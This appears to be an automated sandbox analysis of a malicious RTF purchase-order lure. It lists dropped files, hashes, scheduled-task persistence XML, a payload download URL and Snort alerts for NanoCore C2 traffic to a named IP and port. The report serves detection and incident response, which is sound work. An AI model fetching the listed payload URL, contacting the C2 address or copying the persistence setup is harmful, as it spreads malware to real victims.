	presupuesto.xlsx	Get hash	malicious	Browse	103.140.251.116
	Purchase orders with bank details.ppa	Get hash	malicious	Browse	103.141.138.110
	ZHANGZHOU YIHANSHENG HOUSEWARES.xlsx	Get hash	malicious	Browse	180.214.239.85

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Purchase order_122.doc	Get hash	malicious	Browse
	SWIFT COPY.doc	Get hash	malicious	Browse
	Order Inquiry CEW PTE LTD.doc	Get hash	malicious	Browse
	Ref 0180066743.xlsx	Get hash	malicious	Browse
	001Photocopy.xlsx	Get hash	malicious	Browse
	SB883681QI.xlsx	Get hash	malicious	Browse
	PO-No.00127.doc	Get hash	malicious	Browse
	PO-14092021.doc	Get hash	malicious	Browse
	PO-14092021.doc	Get hash	malicious	Browse
	FACTURA PROFORMA- PO1122002092021.doc	Get hash	malicious	Browse
	Expo Grup - 1122002092021 Sept.doc	Get hash	malicious	Browse
	SWIFT COPY.doc	Get hash	malicious	Browse
	P-C3787633.doc	Get hash	malicious	Browse
	Account Statement.doc	Get hash	malicious	Browse
	NEW Order-05271.doc	Get hash	malicious	Browse
	NEW ORDER.doc	Get hash	malicious	Browse
	Nanocore.New order 22.xlsx	Get hash	malicious	Browse
	PO83783877.xlsx	Get hash	malicious	Browse
	DOC.1000000567.267805032019.doc__.rtf	Get hash	malicious	Browse
	DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\SMTP Service\smtpsvc.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.7499114035101173
Encrypted:	false
SSDEEP:	384:DOj9Y8/gS7SDriLGKq1MHR534Jg6ihJSxUCR1rgCPKabK2t0X5P7DZ+JgySW7XxW:D+gSAdN1MH3IJFRJngyX
MD5:	72A9F09010A89860456C6474E2E6D25C
SHA1:	E4CB506146F60D01EA9E6132020DEF61974A88C3
SHA-256:	7299EB6E11C8704E7CB18F57879550CDD88EF7B2AE8CBA031B795BC5D92CE8E3
SHA-512:	BCD7EC694288BAF751C62E7CE003B4E932E86C60E0CFE67360B135FE2B9EB3BCC97DCDB484CFC9C50DC18289E824439A07EB5FF61DD2C2632F3E83ED77F0CA37
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Purchase order_122.doc, Detection: malicious, Browse Filename: SWIFT COPY.doc, Detection: malicious, Browse Filename: Order Inquiry CEW PTE LTD.doc, Detection: malicious, Browse Filename: Ref 0180066743.xlsx, Detection: malicious, Browse Filename: 001Photocopy.xlsx, Detection: malicious, Browse Filename: SB883681QI.xlsx, Detection: malicious, Browse Filename: PO-No.00127.doc, Detection: malicious, Browse Filename: PO-14092021.doc, Detection: malicious, Browse Filename: PO-14092021.doc, Detection: malicious, Browse Filename: FACTURA PROFORMA- PO1122002092021.doc, Detection: malicious, Browse Filename: Expo Grup - 1122002092021 Sept.doc, Detection: malicious, Browse Filename: SWIFT COPY.doc, Detection: malicious, Browse Filename: P-C3787633.doc, Detection: malicious, Browse Filename: Account Statement.doc, Detection: malicious, Browse Filename: NEW Order-05271.doc, Detection: malicious, Browse Filename: NEW ORDER.doc, Detection: malicious, Browse Filename: Nanocore.New order 22.xlsx, Detection: malicious, Browse Filename: PO83783877.xlsx, Detection: malicious, Browse Filename: DOC.1000000567.267805032019.doc__.rtf, Detection: malicious, Browse Filename: DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	368128
Entropy (8bit):	7.943323696866316
Encrypted:	false
SSDEEP:	6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
MD5:	ACE96CF7EF24EEAC993B4DA172A5A8F0
SHA1:	FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
SHA-256:	D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
SHA-512:	E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	http://binatonezx.tk/catzx.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{...."..}......{...."..}......{...."..}......{...."..}......{...."..}........0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+...0..8........s....%.oo.....%.+o.....%.-o.....%.o.....%.=o......+..".(.........0.. ..............%.r...p.%.r7..p.%....+..&.(.........0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D531D94-C583-4137-BC9C-F35D458886D0}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3496338424734096
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb/:IiiiiiiiiifdLloZQc8++lsJe1MzGl
MD5:	19F47639FEF6B71145F3D48FFB0BCDD3
SHA1:	5A8194771857F03247BAE4FCC84604655FD373D3
SHA-256:	86A7A8F9F015E15CE88322AA2B00EC3E41048CE99D448D00BC9C2ECE4F5FCF70
SHA-512:	6540E8B8C4731FA6EBC05CCB19C433A125119AB29D639701F1F605B7DDC79717EA5CE3438F8129DE1BA60DD1A7C9233FE6BF211A9A172E685F0CB949E2B95918
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9294EB41-BC98-4811-8155-5BA310CE0BF9}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B46515BE-EB2B-43E1-A77A-ECFC555EC443}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.556355218887951
Encrypted:	false
SSDEEP:	192:GW0Jifys7CSDuVIMUycP6T6K6HShBHkVday7IzL2P+mpltOzwIvaL6HYyzOpZijH:GW0IfysOSDuVpzhiSUVYysn2P+mpl8UU
MD5:	988803A25CD76F90623197D3B1CE36DD
SHA1:	435661EFFA5B938E38207C3EB8B1674714C55250
SHA-256:	A9FD08135BE9B98E590733B892CFDD845C8C749DD21090C75A7DE2EA285C48BD
SHA-512:	5C1CBC6385E6434AB1957F1A16A9709DEA56324D678F66DF72417FEE4F1CA30F6C387B3A73FE8FAD2D3B5C2BF875565F9E3CBB13AFBC4B29A83033F3A1416A0D
Malicious:	false
Preview:	!.1./.<.7.3.?.@.2.<.@.?.1...[.$.^.?.1....;.%.].).3.&.3.!.?.=.@.?.6.].~.!.0.[.^.].?.?.%.0...?.].?.?.=.`.?.=...4.$.#...~.6.#.5.4.[...@...?.:.0.6.8.$.3.?.3.(.[.^.?.;.(.7.@.?.^.4.$.0.&..`.[.).'.+...7.?.&.2.1.@.[.+.[.$.].1.<.;.].\|.6.=.0.?....._.0.-.&.&.%.\|.?.)...-.0.,.1.%...?.^.!.~.]...?.!.5.[.\|.7.?.4.].3.(.\|.!.(./.-._._.?...7.&.(..2.0.7.6.@.8.~.?.6.?.$.?.~.;.?.\|.8.].8.?.0.+.]...%./.%.?.~.5.[...@.&.-.?.3.7.?.5.0.^.(.!.8.'.?.%.&.1.=.`...?.+.?.+.?.4.\|.3.7.1.6.6.^.4.3.0.8.>./.#.+.?.,._.?.$.>.9.1.\|.[.?.-..../.(.@.@.?.[.?.-.1.5.>.5.$.8.=.'.6...?...,.`.'.?.^.0...-...[.%.:...9.].7.2...!._.).!...].3.>.$.\|.5.'.^.<.,.9.;.'.2.%.5.`.6.@.6.5.,._.?..`.8./.8.5.?.=.#.(.9.?._.%.0.7.4.?.!.'.?...(.?.)...?.4.7.?.5.0.=.?.`.6.:.&.%.;.,.3..\|.0.3.<.%...5.>.%..9.6.-.%.$.9.$.7.0.).~...[.=.9.1.2.~._.3.\|.;...?.\|....~.%./.%.3.?...@...&.7.,...5.~...9.;.4...+.2.,.%.,.5.?...,.^.`._.?...5._.).<.^.8.=.:.8.4.%.4.].3.*.#.>.$.6.?.^.3.@.&.1.(.].&...,.?.+.?.:.(...^.?..._.6.5.:..._.\|.>.`.1.7.&...?.:.,.(.%.,.?.[.#.8.1.

C:\Users\user\AppData\Local\Temp\tmp1E64.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.1063907901076036
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
MD5:	CFAE5A3B7D8AA9653FE2512578A0D23A
SHA1:	A91A2F8DAEF114F89038925ADA6784646A0A5B12
SHA-256:	2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
SHA-512:	9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp249A.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	5.135021273392143
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mn4xtn:cbk4oL600QydbQxIYODOLedq3Z4j
MD5:	40B11EF601FB28F9B2E69D36857BF2EC
SHA1:	B6454020AD2CEED193F4792B77001D0BD741B370
SHA-256:	C51E12D18CC664425F6711D8AE2507068884C7057092CFA11884100E1E9D49E1
SHA-512:	E3C5BCC714CBFCA4B8058DDCDDF231DCEFA69C15881CE3F8123E59ED45CFB5DA052B56E1945DCF8DC7F800D62F9A4EECB82BCA69A66A1530787AEFFEB15E2BD5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp566B.tmp Download File
Process:	C:\Users\user\AppData\Roaming\catzjt7863.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1619
Entropy (8bit):	5.149397668697177
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB8tn:cbhZ7ClNQi/rydbz9I3YODOLNdq30
MD5:	AA0D2C398EDA2B348EF81AEC7D42D1A4
SHA1:	3CA6B4806670F5D6A8E956FDA8A45BF8CF9623AB
SHA-256:	FBE1D53BEC4781637355317A441AB01E366BCDF1B6B6C05CC90D8E57ECD572C7
SHA-512:	6AF5E9A8144D486B7DE244CC39C4C4ECA99173E3E6FCBBBCC15B09C18BD8A1AE21BCDA43CAA807E1BABF2A723F44853FCF80A2BA119B0DB928C76747BFD256B1
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:dsE:F
MD5:	0B2A8DE244B465CEE106CFB4A8C72E54
SHA1:	C3114CEEEDB5B68D136320D49FE324074F4EDCEF
SHA-256:	A688D2C2784CF368CFDCF621BA67CA62225E9EA3DB0D5DB2DC151BA430A920BC
SHA-512:	1519817080200B27FE65785431178B6D75DAA115B5BC7C255A8B7D6A3754140FEDA2AFAAEA018F96A3F6708EFA46539ABCE92AACF0B1A10E202B07E777678593
Malicious:	true
Preview:	..A...H

C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.795707286467131
Encrypted:	false
SSDEEP:	3:oMty8WbSX/MNn:oMLWus
MD5:	D685103573539B7E9FDBF5F1D7DD96CE
SHA1:	4B2FE6B5C0B37954B314FCAEE1F12237A9B02D07
SHA-256:	D78BC23B0CA3EDDF52D56AB85CDC30A71B3756569CB32AA2F6C28DBC23C76E8E
SHA-512:	17769A5944E8929323A34269ABEEF0861D5C6799B0A27F5545FBFADC80E5AB684A471AD6F6A7FC623002385154EA89DE94013051E09120AB94362E542AB0F1DD
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase order_122.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Tue Oct 26 20:31:28 2021, length=444924, window=hide
Category:	dropped
Size (bytes):	1054
Entropy (8bit):	4.549567670793201
Encrypted:	false
SSDEEP:	12:86M+N6W0gXg/XAlCPCHaXeBhB/OW9qX+W1SpI+nicvbgNA6BsxDtZ3YilMMEpxRy:86Mr/XTuzLIDUie8wxDv3qfE/7Eg
MD5:	549CE2F3B3FDEEC003F6062032D029B9
SHA1:	598B34A40DEF3EA52AC02D4D441B2FB5AAC56CC3
SHA-256:	0FF5F7CD6C64F4BFF66588A7F61817DEDEA410963DC485B02D4A12BA2D8A6C92
SHA-512:	1F137A5FD57B96DE6D72F3E77C9D3403824654D8565251F9401B77E79100DE30B23510CD7C8F31E6A36C4C26911ED5B67D09F83B5EE143F80D55A4674AF26606
Malicious:	false
Preview:	L..................F.... ....5??....5??...[&H.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....ZS. .PURCHA~1.DOC..Z.......S...S...........................P.u.r.c.h.a.s.e. .o.r.d.e.r._.1.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Purchase order_122.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .o.r.d.e.r._.1.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.7123532674005935
Encrypted:	false
SSDEEP:	3:bDuMJlt34KRAX6UXbUmX1aWN4KRAX6UXbUv:bCmoAAX/XbWNAAX/Xb2
MD5:	E2959B2A21E56E70B894EDC112E0A96B
SHA1:	857750C5F3AF616DB86FAF8E5316DF2FCA3FC5E9
SHA-256:	F31756BA08839BD02B995013BA7FC5C708C7FB43F35DD05AA1826105DE787342
SHA-512:	53B1CE40D002ED2656147AA41C8CB1BFE1A111A36E1C998F06D744E0C8A6215F34C135FF4F62FF95812D22DDE78562D5B6681816700C0D0D56325C08F2875073
Malicious:	false
Preview:	[folders]..Templates.LNK=0..Purchase order_122.LNK=0..[doc]..Purchase order_122.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\catzjt7863.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	7.943323696866316
Encrypted:	false
SSDEEP:	6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
MD5:	ACE96CF7EF24EEAC993B4DA172A5A8F0
SHA1:	FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
SHA-256:	D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
SHA-512:	E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{...."..}......{...."..}......{...."..}......{...."..}......{...."..}........0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+...0..8........s....%.oo.....%.+o.....%.-o.....%.o.....%.=o......+..".(.........0.. ..............%.r...p.%.r7..p.%....+..&.(.........0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....

C:\Users\user\AppData\Roaming\eWoGxZG.exe Download File
Process:	C:\Users\user\AppData\Roaming\catzjt7863.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	368128
Entropy (8bit):	7.943323696866316
Encrypted:	false
SSDEEP:	6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
MD5:	ACE96CF7EF24EEAC993B4DA172A5A8F0
SHA1:	FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
SHA-256:	D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
SHA-512:	E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{...."..}......{...."..}......{...."..}......{...."..}......{...."..}........0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+...0..8........s....%.oo.....%.+o.....%.-o.....%.o.....%.=o......+..".(.........0.. ..............%.r...p.%.r7..p.%....+..&.(.........0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....

C:\Users\user\Desktop\~$rchase order_122.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.216719254525903
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Purchase order_122.doc
File size:	444924
MD5:	725c046a9a1bd2456115102985d98dd4
SHA1:	dce11d03bb6838c7761865f5149251d01df65946
SHA256:	9f33c3635ba0c704775ea7c0388955e5649ab913987d990e05f121b6c1681b7c
SHA512:	b2c8c5d2083d6f0b4dd468f9ca191d750e3ffd90bde4fea6e4ee2b88576b9ece5200902482120dcbada52cf0704c743c5539f5b47f268dd6792e0e812142cedb
SSDEEP:	12288:VJfmPBkpevzNkw/AI/OJns8us28f+ngR1CFmBuL:XfmmQHAfJns8uKKW1CFmK
File Content Preview:	{\rtf8860!1/<73?@2<@?1.[$^?1.;%])3&3!?=@?6]~!0[^]??%0.?]??=`?=.4$#.~6#54[.@.?:068$3?3([^?;(7@?^4$0&`[)'+.7?&21@[+[$]1<;]\|6=0?.._0-&&%\|?).-0,1%.?^!~].?!5[\|7?4]3(\|!(/-__?.7&(*2076@8~?6?$?~;?\|8]8?0+].%/%?~5[.@&-?37?50^(!8'?%&1=`.?+?+?4\|37166^4308>/#+?,_?$>

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000016B2h								no
1	00001677h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/26/21-14:32:46.286372	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50591	8.8.8.8	192.168.2.22
10/26/21-14:32:46.751389	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49166	1665	192.168.2.22	103.133.109.121
10/26/21-14:32:51.536900	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57805	8.8.8.8	192.168.2.22
10/26/21-14:32:51.555779	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57805	8.8.8.8	192.168.2.22
